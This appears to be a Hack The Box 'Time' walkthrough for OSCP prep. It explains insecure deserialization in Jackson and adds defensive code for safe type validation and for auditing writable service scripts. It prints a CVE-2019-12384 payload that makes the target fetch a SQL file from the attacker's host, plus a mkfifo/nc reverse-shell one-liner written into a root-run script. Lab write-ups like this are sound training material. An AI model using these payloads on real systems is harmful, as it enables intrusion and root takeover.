System Weakness

System Weakness is a publication that specialises in publishing upcoming writers in cybersecurity and ethical hacking space. Our security experts write to make the cyber universe more secure, one vulnerability at a time.

HTB — Time (OSCP Prep)

“It was the best of times, it was the worst of times.”― Charles Dickens, A Tale of Two Cities

Hello friends! This is the 26th walkthrough of our OSCP Preparation. I hope you’re enjoying my content. I’m planning to solve all the HTB as long as I have time and patience :)

Let’s start our enumeration with nmap as usual :

Findings:
+ port 22: an SSH service is running.
+ port 80: an Apache web server hosts a page titled “Online JSON parser”.

I had no idea what a “JSON parser” was, so I googled it:
A JSON (JavaScript Object Notation) parser is a program that reads a JSON-formatted text file and converts it into a more easily usable data structure, such as a dictionary or a list in Python or an object in JavaScript.

So what we understand from this is that JSON is a text format whose syntax comes from JavaScript, and a parser reads that text and turns it into a data structure a program can work with.

And another question : What is JSON ?
“JSON is a lightweight format for storing and transporting data.”
“JSON is often used when data is sent from a server to a web page.”

Example :

{
"employees":[
{"firstName":"John", "lastName":"Doe"},
{"firstName":"Anna", "lastName":"Smith"},
{"firstName":"Peter", "lastName":"Jones"}
]
}

As you can see, the data is written as name : “value” pairs separated by commas. Curly brackets hold objects and square brackets hold arrays.

Good, at least we have an idea about JSON before starting the enumeration. Let’s keep going and navigate to the webpage :

OK. There is one more thing for us here. What is a JSON Beautifier / Validator?

A JSON beautifier is a tool that simplifies the process of formatting cluttered JSON code into a well-structured format by adding indents and line breaks.
A JSON Validator is a tool that checks JSON data for proper syntax and structure.

This means that this tool will try to check our JSON data and will try to write it in a proper format. Let’s enter a text and beautify it :

Then I tried the same process with the “Validate” option and got the following error :

“Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object”

I had no idea what was going on at this point, so I googled the error together with the word “exploit”: “com.fasterxml.jackson exploit”. I found several websites which mention that an attacker may attempt to exploit an Insecure Deserialization vulnerability in FasterXML jackson-databind.

OK. I have zero IT background, and I still don’t know what I need to do here. So I asked ChatGPT in order to explain the Serialization & Deserialization :
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Step 1: Understanding Serialization and Deserialization
In programming, serialization converts objects into text or binary format so they can be stored or sent over a network.
* Example : Serialization in JSON format.
Imagine we have a user object with a name and age :

{
"name": "Alice",
"age": 25
}

This is a serialized version of a user. The data is structured in JSON format so it can be easily stored or transferred.

What is Deserialization?

Deserialization is the reverse of serialization. It takes the stored data (JSON, XML, or binary) and converts it back into an object that a program can use.

🔹 Example: Deserialization in JavaScript

Let’s say we receive a JSON string:

'{"name": "Alice", "age": 25}'

If we deserialize this in JavaScript, we get an object:

let user = JSON.parse('{"name": "Alice", "age": 25}');
console.log(user.name); // Output: Alice
console.log(user.age); // Output: 25

Now, our JSON string has been converted back into a usable object.

Danger Zone: If we deserialize untrusted data without checking it first, attackers can inject malicious content, which brings us to our next step.

Step 2: What is Insecure Deserialization?
Insecure deserialization happens when an application blindly trusts and processes untrusted data.
An attacker could modify the data before sending it to the server. If the server executes this malicious data, the attacker might gain control of the system.

Step 3: How Attackers Exploit Insecure Deserialization
* Remote Code Execution (RCE)
Attack Idea: If an attacker injects a malicious script inside a serialized object, it might get executed when the data is deserialized.

Example Attack Scenario:

A web app accepts user data in JSON format.
It deserializes this data without validation.
The attacker modifies the JSON to include a hidden payload.
The server processes this dangerous input and executes unwanted actions.

Summary
1️⃣ Serialization converts an object into a format for storage or transfer (e.g., JSON).
2️⃣ Deserialization converts it back into an object.
3️⃣ Insecure deserialization happens when an app blindly processes untrusted data.
4️⃣ Attackers can inject malicious payloads for Remote Code Execution (RCE).

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

I think we have an idea now, but I still have further questions. For example, our error starts with “com.fasterxml.jackson”: what is “jackson”? Let’s go further and ask another question: “can we somehow find an RCE related to this error?”
Googling “com.fasterxml.jackson exploit” led me to different articles and GitHub pages. For example, one of them analyzes the vulnerability CVE-2019-12384.

Jackson gadgets — Anatomy of a vulnerability (blog.doyensec.com)

According to the article, an attacker leverages this deserialization vulnerability to trigger an SSRF & RCE.
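The “need JSON Array to contain As.WRAPPER_ARRAY type information” error quoted above is what Jackson produces when an ObjectMapper has global default typing enabled and the client sends a plain object instead of the two-element array it expects: the first element names a Java class and the second holds its properties, which is why a client-chosen class name ends up being instantiated on the server. The Java snippet below is an added example (not code from this writeup, from the Doyensec article or from the jas502n repository); it reproduces the error with a weakly configured mapper, shows that the array form is accepted by it, and shows the hardened configuration, a PolymorphicTypeValidator allowlist, rejecting a type id outside the allowed package (the prefix com.example.model. is a placeholder). It also ties together the serialization, deserialization and untrusted-input steps from the explanation above.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.exc.MismatchedInputException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingDemo {
    // Constructed inputs. The array is the As.WRAPPER_ARRAY shape the error asks for:
    // element 0 names a class (client-controlled), element 1 holds its properties.
    static final String PLAIN_INPUT = "{\"a\": 1}";
    static final String TYPED_INPUT = "[\"java.util.HashMap\", {\"a\": 1}]";

    // Weak setting: global default typing with no validator, so any class on the
    // classpath named in element 0 gets instantiated. Deprecated since 2.10.
    @SuppressWarnings("deprecation")
    static ObjectMapper weakMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping();
        return m;
    }

    // Hardened setting: polymorphic typing only for an allowlisted package
    // prefix (hypothetical here); any other type id is rejected before lookup.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.").build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    public static void main(String[] args) throws Exception {
        // 1. Plain object + weak mapper reproduces the page's MismatchedInputException.
        try {
            weakMapper().readValue(PLAIN_INPUT, Object.class);
        } catch (MismatchedInputException e) {
            System.out.println("weak mapper, plain object: " + e.getOriginalMessage());
        }
        // 2. Typed array + weak mapper: the named class is instantiated.
        Object o = weakMapper().readValue(TYPED_INPUT, Object.class);
        System.out.println("weak mapper instantiated: " + o.getClass().getName());
        // 3. Typed array + hardened mapper: class name outside the allowlist is refused.
        try {
            hardenedMapper().readValue(TYPED_INPUT, Object.class);
        } catch (InvalidTypeIdException e) {
            System.out.println("hardened mapper rejected type id: " + e.getTypeId());
        }
    }
}
```

Requires jackson-databind 2.10 or later on the classpath for activateDefaultTyping and BasicPolymorphicTypeValidator.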

The GitHub page:

GitHub — jas502n/CVE-2019-12384: Jackson Rce For CVE-2019-12384 (github.com)

Let’s clone the repository locally. The process is: create an inject.sql file, then make the target fetch that file from our attacking machine by means of the payload.

inject.sql :

Now we need to serve this :

python3 -m http.server 4444

And in order to catch the reverse shell I need a nc listener :

nc -lvnp 1234

The payload below will be provided as input:

[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.33:4444/inject.sql'\"}]

We got the shell as the user pericles.

Privilege Escalation :

Running linpeas showed us that there is a script “timer_backup.sh” inside the directory /usr/bin/ which is writable by normal users.

The user pericles has rwx access to it; however, when I tried to run it, I got an error.

One thing is surprising: although pericles has all the rights, he cannot run the script!

And in the script the zip file is moved under the root directory. Hence it must be run by root itself!

If I edit the script I can gain root privileges:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.33 8881 >/tmp/f' > /usr/bin/timer_backup.sh

and a few seconds later:

#QED!
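The root cause of this privilege escalation is a script that root runs on a schedule while an unprivileged user can write to it. The shell function below is an added example, not part of the original writeup; it audits systemd service units (the assumption being that the timer on the box triggers a .service whose ExecStart points at the script) and flags every ExecStart target that is group- or world-writable, which is exactly how /usr/bin/timer_backup.sh would have shown up.

```sh
#!/bin/sh
# Added example (not from the original writeup): a defender's audit for the
# misconfiguration abused above, a script that root executes from a systemd
# service or timer while non-root users can write to it. On a real host run:
#   audit_exec_targets /etc/systemd/system
#
# audit_exec_targets UNIT_DIR
#   Reads every ExecStart= line in UNIT_DIR/*.service, extracts the program path
#   (dropping systemd's -, @, +, !, : prefixes and any arguments) and prints
#   "WRITABLE <path>" for each existing target whose group or other write bit
#   is set. Empty output means nothing was flagged.
audit_exec_targets() {
    unit_dir="$1"
    for unit in "$unit_dir"/*.service; do
        [ -f "$unit" ] || continue
        grep -h '^ExecStart=' "$unit" | sed 's/^ExecStart=[-@+!:]*//' | awk '{print $1}'
    done | sort -u | while IFS= read -r target; do
        [ -f "$target" ] || continue
        # find prints the path only if the g+w or o+w bit is set on it.
        if [ -n "$(find "$target" \( -perm -g+w -o -perm -o+w \) 2>/dev/null)" ]; then
            echo "WRITABLE $target"
        fi
    done
}
```

A flagged file is fixed by restoring root ownership and removing the group/other write bits, and the same check is worth repeating for /etc/cron.d entries on hosts that schedule jobs with cron instead of systemd timers.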

Perikles hält die Leichenrede (Pericles’ Funeral Oration), an 1852 painting by Philipp Foltz.
